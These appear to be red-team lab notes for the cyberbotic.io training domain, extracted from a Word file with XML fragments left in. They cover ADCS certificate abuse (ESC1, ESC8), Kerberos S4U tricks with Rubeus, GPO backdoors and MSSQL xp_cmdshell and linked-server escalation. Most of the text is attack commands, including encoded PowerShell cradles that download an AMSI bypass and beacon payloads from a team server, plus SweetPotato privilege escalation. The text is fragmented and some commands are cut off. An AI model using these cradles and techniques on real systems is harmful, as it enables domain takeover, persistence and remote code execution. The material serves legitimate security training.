ldap/dc-2.dev.cyberbotic.io -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -shadowcred -port 10</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3.3 - Like Whisker does, KrbRelay provides Rubeus command that will request a TGT for WKSTN-2. However, it will return an RC4 ticket so if you want an AES instead, do.</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/user:WKSTN-2$ /certificate:MIIJyA[...snip...]QCAgfQ /password:"06ce8e51-a71a-4e0c-b8a3-992851ede95f" /enctype:aes256 /nowrap</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3.4 - The S4U2Self trick can then be used to obtain a HOST service ticket like we did with RBCD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3EB7">
      <w:pPr>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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:Administrator /self /altservice:host/wkstn-2 /user:wkstn-2$ /ticket:doIGkD[...snip...]5pbw== /ptt</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Active Directory Certificate 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Finding Certificate Authorities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cas /domain:dev.cyberbotic.io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Miconfigured Certificate template (By dafault /vulnerable parameter looks only for Domain Users group in Enrollment Rights)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find /vulnerable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find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find /enrolleeSuppliesSubject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ESC1 ( ENROLLEE_SUPPLIES_SUBJECT ) - Misconfigured Certificate Templates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Find the misconfigured certificate,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Look for Enrollment Rights,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check if *ENROLLEE_SUPPLIES_SUBJECT* is enabled in property (msPKI-Certificate-Name-Flag)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certificate usage (pkiextendedkeyusage) has *Client Authentication* set.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find /vulnerable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getuid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find /enrolleeSuppliesSubject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Request a Certificate for other domain user (Domain Admin)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request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb /domain:dev.cyberbotic.io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For OutBound Forests the Certify fails , So either use Certreq or modify the Certify Source code.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Check this for help : [https://github.com/GhostPack/Certify/issues/13#issuecomment-1716046133](https://github.com/GhostPack/Certify/issues/13#issuecomment-1716046133)</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Copy the whole certificate (both the private key and certificate) and save it to .pem file. Then use openssl command to convert it to pfx format.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ubuntu@DESKTOP-3BSK7NO ~&gt; openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx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Convert .pfx into a base64 encoded string so it can be used with Rubeus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ubuntu@DESKTOP-3BSK7NO ~&gt; cat cert.pfx | base64 -w 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use asktgt to request a TGT for the user using the certificate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/user:nlamb /password:pass123 /nowrap /certificate:MIIM7w[...]ECAggA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5. Inject the TGT and look for Local Admin Access on other domain computers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Look for Local Admin Access on other domain computers.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Find-LocalAdminAccess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Then check if you can access anything on that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ESC8 - NTLM Relaying to ADCS HTTP Endpoints**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Prerequisite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both DC and CA are setup on same machine then we wouldn’t be able to relay a DC to a CA. In that case we can use ESC8 to gain access to machine where unconstrained delegation is configured, So that we can abuse the unconstrained Delegation later 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Web End point for certificate services is at http[s]://&lt;hostname&gt;/certsrv.</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Redirect the NTLM auth traffic using PrintSpool attack from DC to CA (if services running on seperate system) to fetch the DC Certificate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But if they are both running on same server then we can execute the attack targetting a system where unconstrained delegation (WEB) is allowed, and force it to authenticate with CA to capture its certificate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Do the same setup for ntlmrelayx and use print spooler to force DC/WEB to authenticate with wkstn2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Setup socks proxy (beacon session)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1080 socks5 disableNoAuth socks_user socks_password enableLogging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8090 socks4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stop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Setup Proxychains to use this proxy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sudo nano /etc/proxychains.conf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socks5 127.0.0.1 1080 socks_user socks_password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Execute NTLMRelayx to target the certificate server endpoint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the IP of the CA (DA and CA are both same in lab).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Get-IPAddress -Identity dc-2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attacker@ubuntu ~&gt; sudo proxychains ntlmrelayx.py -t https://&lt;CA-ip&gt;/certsrv/certfnsh.asp -smb2support --adcs --no-http-server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attacker@ubuntu ~&gt; sudo proxychains ntlmrelayx.py -t https://10.10.122.10/certsrv/certfnsh.asp -smb2support --adcs --no-http-server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Setup reverse port forwarding (System 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8445 127.0.0.1 445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stop 8445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Upload PortBender driver and load its cna file (System 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C:\Windows\system32\drivers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C:\Tools\PortBender\WinDivert64.sys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PortBender redirect 445 8445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To kill portbender , Kill the job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jobs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jobkill &lt;JID&gt;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Use PrintSpool attack to force WEB (unconstrained) server to authenticate with wkstn 2 (Domain Sesion)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C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe &lt;Unconstrained-Machine-IP&gt; &lt;Current-Machine-IP&gt;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C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe 10.10.122.30 10.10.123.102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7. Use the Base64 encoded machine certificate obtained to get TGT of machine account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/user:WEB$ /certificate:MIIM7w[...]ECAggA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8. Use the TGT ticket obtained for S4U attack to get a service ticket TGS.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/impersonateuser:Administrator /self /altservice:cifs/web.dev.cyberbotic.io /nowrap /user:WEB$ /ticket:doIFuj[...]lDLklP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9. Inject the Service Ticket by creating a new sacrificial token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/username:Administrator /password:FakePass /ticket:doIFyD[...]MuaW8=tok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10. Steal token and access the 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1234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\\web.dev.cyberbotic.io\c$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11. Revert all the changes made during attack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socks stop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jobs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jobkill &lt;portbender-Job-ID&gt;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stop 8445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PERSIST-1 &amp; PERSIST-2 : User &amp; Computer Persistance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PERSIST-1 : User Persistance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1-a. Enumerate and export user certificate from their Personal Certificate store (execute from user session)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Certificates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Export the certificate as DER and PFX file on disk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crypto::certificates /export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1-b. If the user does not have a certificate in their store, we can just request one with Certify. Make sure we are in Domain user's sessions context of user for which we are requesting certificate.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request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:User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Save the Private And Public key both in a file with .pem extension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Then convert the .pem file to .pfx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ubuntu@DESKTOP-3BSK7NO ~&gt; openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx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Encode the PFX file to be used with Rubeus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ubuntu@DESKTOP-3BSK7NO ~&gt; cat /mnt/c/Users/Attacker/Desktop/CURRENT_USER_My_0_Nina\ Lamb.pfx | base64 -w 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Use certificate to request TGT for the user (/enctype:aes256 - Better OPSEC)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/user:nlamb /certificate:MIINeg[...]IH0A== /password:mimikatz /enctype:aes256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Inject the User TGT and look for Local Admin access on Domain machines.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Look for Local Admin Access on other domain computers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Find-LocalAdminAccess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Then check if you can access anything on that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PERSIST-2 : Computer Persistance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1-a. Export the machine certificate (requires elevated session)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Certificates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!crypto::certificates /systemstore:local_machine /export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download local_machine_My_0_wkstn-2.dev.cyberbotic.io.pfx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1-b. If machine certificate it not stored, we can requet it using Certify (/machine param is required for auto elevation to system privilege)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request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:Machine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Save the Private And Public key both in a file with .pem extension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Then convert the .pem file to .pfx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ubuntu@DESKTOP-3BSK7NO ~&gt; openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx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Encode the certificate, and use it with Rubeus to get TGT for machine account.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ubuntu@DESKTOP-3BSK7NO ~&gt; cat /mnt/c/Users/Attacker/Desktop/local_machine_My_0_wkstn-2.dev.cyberbotic.io.pfx | base64 -w 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/user:WKSTN-1$ /enctype:aes256 /certificate:MIINCA[...]IH0A== /password:mimikatz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Then Using S4U2Self to get the TGS from the Machine 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Generate TGS from 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/impersonateuser:Administrator /self /altservice:cifs/web.dev.cyberbotic.io /user:WEB$ /nowrap /ticket:doIFuj[...]lDLklP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TGS in a sacrificial process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C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:Administrator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\\web.dev.cyberbotic.io\c$</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Group Policy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Modify Existing GPO**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Identify GPO where current principal has modify rights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 -Domain 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Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild|WriteProperty" -and $_.SecurityIdentifier -match "S-1-5-21-569305411-121244042-2357301523-[\d]{4,10}"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Resolve GPOName, Path and SID of principal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Get-DomainGPO -Identity "CN={5059FAC1-5E94-4361-95D3-3BB235A23928},CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" | select displayName, gpcFileSysPath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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107</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"Developers" -Domain dev.cyberbotic.io -Recurse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\\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{5059FAC1-5E94-4361-95D3-3BB235A23928}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Identify the domain OU where the above GPO applies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Get-DomainOU -GPLink "{5059FAC1-5E94-4361-95D3-3BB235A23928}" | select distinguishedName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Identify the systems under the given OU</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-SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName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Setup a smb listener and download &amp; execute cradle pointing to port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Make sure to use AMSI Bypass with the powershell cradle.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$str = "iex (iwr http://wkstn-2:8080/amsi-bypass.ps1 -UseBasicParsing) ; iex (iwr http://wkstn-2:8080/smb -UseBasicParsing);"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[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))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 -w hidden -nop -enc aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApACAAOwAgAGkAZQB4ACAAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBzAG0AYgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQA7A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Enable inbound traffic on WebDrive by ports (8080) (requires system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New-NetFirewallRule -DisplayName "Rule 1" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort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Remove-NetFirewallRule -DisplayName "Rule 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7. Setup port forwarding rule to accept the Payload Download request locally and forward to our team server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8080 127.0.0.1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stop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netstat -anp tcp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8. Use sharpGPOAbuse to add the backdoor (scheduled task) for execution on targetted system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iex (iwr http://wkstn-2:8080/amsi-bypass.ps1 -UseBasicParsing) ; iex (iwr http://wkstn-2:8080/smb -UseBasicParsing);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execute-assembly C:\Tools\SharpGPOAbuse\SharpGPOAbuse\bin\Release\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "C:\Windows\System32\cmd.exe" --Arguments "/c powershell -w hidden -nop -enc aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApACAAOwAgAGkAZQB4ACAAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBzAG0AYgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQA7AA==" --GPOName "Vulnerable GPO" --Force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9. Now as we are using smb listener , We have to manually link with each machine that were present in the OU where this GPO was applied.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Make sure to monitor the web log in cobalt strike for Payload Downloads, And connect to the Smb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WKSTN-1 TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57</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10. Lastly, either we can wait for the GPO  to be applied or force update to get reverse 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cmd&gt; gpupdate /force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11. Cleaup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stop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Remove-NetFirewallRule -DisplayName "Rule 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and Link new GPO**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Check the rights to create a new GPO in Domain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Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier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"Developers" -Domain dev.cyberbotic.io -Recurse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Find the OU where any principal has "Write gPlink Privilege"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Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier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ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1107</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-SearchBase "OU=Workstations,DC=dev,DC=cyberbotic,DC=io" | select dnsHostName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Verify if RSAT module is installed for GPO abuse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Get-Module -List -Name GroupPolicy | select -expand ExportedCommands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Create a new GPO &amp; configure it to execute attacker binary via Registry loaded from shared location or Use Powershell cradle to download payload from CS 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New-GPO -Name "Evil GPO"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4-a. Using Shared Location to upload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Find-DomainShare -CheckShareAccess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cd \\dc-2\software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upload C:\Payloads\pivot.exe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powerpick Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c \\dc-2\software\pivot.exe" -Type ExpandString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HKLM based autorun changes requires system reboot to take effect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4-b. Or Use Powershell cradle to download payload from CS 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download &amp; execute smb cradle pointing to pivot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Make sure to use AMSI Bypass with the powershell cradle.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$str = "iex (iwr http://wkstn-2:8080/amsi-bypass.ps1 -UseBasicParsing) ; iex (iwr http://wkstn-2:8080/smb -UseBasicParsing);"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C:\&gt; [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))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 -w hidden -nop -enc aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApACAAOwAgAGkAZQB4ACAAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBzAG0AYgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQA7A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Enable inbound traffic on WebDrive by ports (8080) (requires system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New-NetFirewallRule -DisplayName "Rule 1" -Profile Domain -Direction Inbound -Action Allow -Protocol TCP -LocalPort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Setup port forwarding rule to accept the Payload Download request locally and forward to our team server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8080 127.0.0.1 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Configure  GPO to use the powershell execute cradle.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Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "C:\Windows\System32\cmd.exe /c powershell -w hidden -nop -enc aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwB3AGsAcwB0AG4ALQAyADoAOAAwADgAMAAvAGEAbQBzAGkALQBiAHkAcABhAHMAcwAuAHAAcwAxACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApACAAOwAgAGkAZQB4ACAAKABpAHcAcgAgAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBzAG0AYgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAKQA7AA==" -Type ExpandString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Link newly created GPO with OU</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Get-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=cyberbotic,DC=io"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Now as we are using smb listener , We have to manually link with each machine that were present in the OU where this GPO was applied.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Make sure to monitor the web log in cobalt strike for Payload Downloads, And connect to the Smb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link WKSTN-1 TSVCPIPE-4036c92b-65ae-4601-1337-57f7b24a0c57</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7. Lastly, either we can wait for the GPO  to be applied or force update to get reverse shell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cmd&gt; gpupdate /force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8. Cleaup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stop 8080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Remove-NetFirewallRule -DisplayName "Rule 1"</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MSSQL Servers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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MSSQL Server - Quick Commands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MSSQL Server - Cheatsheet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SQLRecon : https://github.com/skahwah/SQLRecon/wiki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PowerUpSQL : https://github.com/NetSPI/PowerUpSQL/wiki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 Look for MSSQL Server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C:\Tools\PowerUpSQL\PowerUpSQL.ps1</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Get-SQLInstanceDomain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#2 Check if we can access the MSSQL Server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Get-SQLConnectionTest -Instance sql-2.dev.cyberbotic.io | fl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powerpick Get-SQLServerInfo -Instance sql-2.dev.cyberbotic.io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Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo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#3 Look for users/groups which have access to these servers and somehow get access to that user/group. Or Try Kerberoasting the MSSQL Server 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 -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername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#4 Try to run some common queries on sql servers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 -Query "select @@version"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/c:"select @@version"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#5 Check if we have sysadmin access , if yes then use it to enable xp_cmdhsell and execute commands.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C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /m:whoami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/m:EnableXp</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/m:xpcmd /command:"whoami"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#6 Check if xp_cmdshell in enabled, if enabled execute commands.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  -Query "SELECT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#7 Check if impersonation is allowed, if yes then impersonate the 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/m:impersonate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/m:iwhoami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#8 Check if impersonated user have sysadmin access. If yes then use it to enable xp_cmdshell, and then execute commands and get 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/m:iwhoami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/m:iEnableXp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/m:iQuery /i:DEV\mssql_svc /c:"SELECT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/m:ixpcmd /i:DEV\mssql_svc /command:"whoami"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#9 Check if linked Servers are available.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#10 Check if we can execute queries on linked Server.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/c:"select @@version"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w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.dev.cyberbotic.io /l:sql-1.cyberbotic.io /m:lquery /c:"select @@version"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#11 Check if xp_cmdshell is enabled on linked server. If yes then execute command using RPC.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/c:"EXEC('exec master..xp_cmdshell ''ipconfig''') AT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/c:"EXEC('exec master..xp_cmdshell ''ping -n 1 10.10.123.102''') AT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#12 Check if rpc_out is enabled (Not default configuration) on each links,  and also we have sysadmin access on linked server.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Links are configured from source -&gt; destination. so the source has control over the link.</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So basically we only need (for A linked to B)</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Sysadmin access on target link server (on B)</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rpc_out enabled on link (A to B) OR sysadmin access on prior server (A) for successfully enabling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#12-a Check RPC_Out enabled or not (For a link between SQL-2 to SQL-1 we have to check RPC settings in SQL-2 for SQL-1,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/c:"SELECT name, is_rpc_out_enabled FROM sys.servers;"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#12-b If rpc_out is not enabled , Check if the Source server ( for A--&gt;B , Source is A) has sysadmin access or we can perform impersonation. After getting sysadmin access we can enable rpc_out for the link.</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/m:impersonate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/m:iwhoami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/c:"EXEC sp_serveroption 'sql-1.cyberbotic.io', 'rpc out', 'true';"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w:t>
      </w:r>
      <w:r w:rsidRPr="003E3EB7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.dev.cyberbotic.io /m:query /c:"EXEC sp_serveroption 'sql-1.cyberbotic.io', 'rpc', 'true';"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#12-c Check sysadmin access enabled or not.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#12-d If both rpc_out and sysadmin access is enabled , then enable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/c:"EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT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/c:"EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT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#12-e Execute Commands using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/c:"EXEC('exec master..xp_cmdshell ''ipconfig''') AT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#13 Check if impersonation is allowed on linked Servers. If yes then impersonate the user and check for xp_cmdshell and sysadmin access, and if sysadmin is enabled then we can also enable xp_cmdshell to get code execution.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Query will return the IDs, So we have to convert them to principals.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/c:"SELECT * FROM sys.server_permissions WHERE permission_name = ''IMPERSONATE'';"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Converting IDs to principal names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/c:"SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;"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Impersonate the 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/c:"EXECUTE AS login = ''DEV\mssql_svc'' ; SELECT SYSTEM_USER;"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#Check for sysadmin access.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/c:"EXECUTE AS login = ''DEV\mssql_svc'' ;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Check for rpc_out enabled or not.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execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io /l:sql-1.cyberbotic.io /m:lquery /c:"SELECT name, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1;"</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both sysadmin access is available and rpc_out is enabled,we can execute commands.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/c:"EXECUTE AS login = ''DEV\mssql_svc'' ; exec master..xp_cmdshell ''whoami''"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#14 After getting shell access to any MSSQL Server , Check if it runs under the default NT Service\MSSQLSERVER , by using getuid command.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getuid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shell whoami /priv</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TokenPrivileges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#15 Check for *seimpersonate* privilege and if present run sweet potato exploit to abuse it to get Priv Esc to SYSTEM.</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Encoded Powershell payload.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powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA==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Execute sweet potato to get reverse shell/beacon as system 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C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4ANQA2AC4AMQAzADkAOgA4ADAALwBhACcAKQApAA=="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connect localhost 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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MSQSL Server - Enumeration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MSSQL Server - Enumeration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SQLRecon : https://github.com/skahwah/SQLRecon/wiki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PowerUpSQL : https://github.com/NetSPI/PowerUpSQL/wiki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Use PowerUpSQL for enumerating MS SQL Server instances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C:\Tools\PowerUpSQL\PowerUpSQL.ps1</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Get-SQLInstanceDomain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/enum:sqlspns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Send network braodcast and UDP scan to identify any instance of sql db</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Get-SQLInstanceBroadcast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Get-SQLInstanceScanUDP</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2-a. Check access to DB instance with current user session.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Get-SQLConnectionTest -Instance sql-2.dev.cyberbotic.io | fl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xml:space="preserve">beacon&gt; powerpick Get-SQLServerInfo -Instance sql-2.dev.cyberbotic.io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Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo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2-b. Find user that have access to SQL Servers.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Method-1 : Finding Users (or groups) which may have access to the SQL instance, We can look for appropriately named Domain Groups and their members.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 -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername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Method-2 : Another option is to go after the MS SQL service account itself as this is also often given sysadmin privileges. (Check Notes for steps).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As the Domain Account running the SQL Service have its SPN, So the account may be kerberoastable. We can crack the hash to obtain plaintext password and use it to gain access to SQL instance.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Check for sysadmin access  (0 -&gt; Not SysAdmin , 1-&gt; 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/auth:wintoken /host:sql-2.dev.cyberbotic.io /module:info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 -Query "SELECT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Enumerate for What roles we do have.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/l:sql-1.dev.cyberbotic.io /m:lwhoami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Check if xp_cmdshell is enabled (0 -&gt; Disable, 1 -&gt; Enable), also check for sysadmin access.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/l:sql-1.dev.cyberbotic.io /m:whoami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have sysadmin access , then enable it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/m:ienablexp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/l:sql-1.dev.cyberbotic.io /m:lenablexp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Query execution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C:\Tools\PowerUpSQL\PowerUpSQL.ps1</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  -Query "select @@servername"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Get-SQLServerLinkCrawl -Instance sql-2.dev.cyberbotic.io -Query "exec master..xp_cmdshell 'whoami'"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/m:query /c:"select @@servername"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/l:sql-1.cyberbotic.io /m:lquery /c:"select @@servername"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Find the linked SQL Servers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powerpick Get-SQLServerLink -Instance sql-2.dev.cyberbotic.io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 -Query "exec master..xp_cmdshell 'whoami'"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Check if target SQLServer or its linked Server have syadmin access. (0 -&gt; Not SysAdmin , 1-&gt; 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 -Query "SELECT * FROM OPENQUERY('sql-1.cyberbotic.io', 'select @@servername');"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 -Query "SELECT IS_SRVROLEMEMBER('sysadmin');" -QueryTarget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MSSQL Server - Impersonation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MSSQL Server - Impersonation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Discover accounts which can be impersonated using impersonate module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/m:impersonate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2-a. Impersonating a user account from current user using SQLRecon's "impersonation mode" by prefixing the module name with an i and specifying the principal to impersonate.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/m:iwhoami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2-b. OR Impersonating a user account from current user using SQL Querie (EXECUTE AS)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EXECUTE AS login = 'DEV\mssql_svc' ; SELECT SYSTEM_USER;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EXECUTE AS login = 'DEV\mssql_svc' ;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Check the current user access using SQL Queries (0 -&gt; Not SysAdmin , 1-&gt; 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SYSTEM_USER;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3. Check if after impersonation , we have acccess to sysadmin or xp_cmdshell is enabled.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/m:iwhoami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/m:iQuery /i:DEV\mssql_svc /c:"SELECT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Enable xp_cmdshell when we have sysadmin access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/m:iEnableXp /i:DEV\mssql_svc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3EB7" w:rsidRPr="003E3EB7" w:rsidRDefault="003E3EB7" w:rsidP="003E3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MSSQL Server - Command Execution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MSSQL Server - Command Execution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Check if target SQLServer or its linked Server have syadmin access. (0 -&gt; Not SysAdmin , 1-&gt; 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SYSTEM_USER;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/auth:wintoken /host:sql-2.dev.cyberbotic.io /module:info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 -Query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Enumerate for What roles we do have.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/h:sql-2.dev.cyberbotic.io,1433 /m:whoami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If current user have Sysadmin Access then Execute the command using inbuild module Invoke-SQLOSCmd from PowerUpSQL. (It automatically enables xp_cmdshell stored procedure and disables after code execution) -- Better OPSEC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Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults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Check if xp_cmdshell is enabled (0 -&gt; Disable, 1 -&gt; Enable)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"sql-2.dev.cyberbotic.io,1433" -Query "SELECT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Manually Enable the xp_cmdshell stored procedure (manually + PowerUpSql + SQLRecon)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sp_configure 'Show Advanced Options', 1; RECONFIGURE;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sp_configure 'xp_cmdshell', 1; RECONFIGURE;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"sql-2.dev.cyberbotic.io,1433" -Query "sp_configure 'Show Advanced Options', 1; RECONFIGURE;"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"sql-2.dev.cyberbotic.io,1433" -Query "sp_configure 'xp_cmdshell', 1; RECONFIGURE;"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C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:ienablexp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Command Execution when xp_xmdshell is enabled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EXEC xp_cmdshell 'whoami'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"sql-2.dev.cyberbotic.io,1433" -Query "EXEC xp_cmdshell 'whoami'"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/h:sql-2.dev.cyberbotic.io,1433 /m:ixpcmd /i:DEV\mssql_svc /c:ipconfig</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Get Remote shell or beacon access through Command Execution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6-a. Check if smb port (445) is open on target machine. So we can decide from SMB Payload or pivot listener. If smb port is available the use SMB payload else create a pivot listener.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portscan 10.10.122.25 445</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/h:sql-2.dev.cyberbotic.io,1433 /m:ixpcmd /i:DEV\mssql_svc /c:"ping -n 1 &lt;TEAMSERVER-IP&gt;"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6-b. Check if the Target SQL Server can connect to teamserver , if not then enable the port forwarding and add a firewall rule. (Need Admin Privilege)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New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080</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8080 127.0.0.1 80</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6-c. For pivot listener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a pivot listener beacon &gt; Pivoting &gt; Listener and keep the settings same and change only port and name.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netstat -anop tcp</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Setup a Scripted Web Delivery payload to /pivot endpoint and add the teamserver domain or IP and port 80 or 443 and select pivot listener.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go to initial beacon machine and enable port forwarding and firewall to facilitate the powershell script delivery.</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New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080</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rportfwd 8080 127.0.0.1 80</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ping -n 1 10.10.123.102</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modify the payload as below</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powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://&lt;Initial-beacon-IP&gt;:8080/pivot'))"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echo -n "IEX ((new-object net.webclient).downloadstring('http://&lt;Initial-beacon-IP&gt;:8080/pivot'))" | iconv -t UTF-16LE | base64 -w 0</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Now execute the powershell script cradle in the target machine , and we should now have the access.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6-d. Download and execute cradle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powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://&lt;Initial-beacon-IP&gt;:8080/a'))"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Convert into encoded format to prevent issues with quotes mismatch</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echo -n "IEX ((new-object net.webclient).downloadstring('http://192.168.56.139:80/a'))" | iconv -t UTF-16LE | base64 -w 0</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Updated powershell cradle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powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMwAuADEAMAAyAC8AcABpAHYAbwB0ACcAKQApAA==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6-e. Execute the payload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/m:ixpcmd /i:DEV\mssql_svc /c:"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADIAMwAuADEAMAAyADoAOAAwADgAMAAvAHAAaQB2AG8AdAAnACkAKQA="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"sql-2.dev.cyberbotic.io,1433" -Query "EXEC xp_cmdshell 'powershell.exe -nop -w hidden -enc 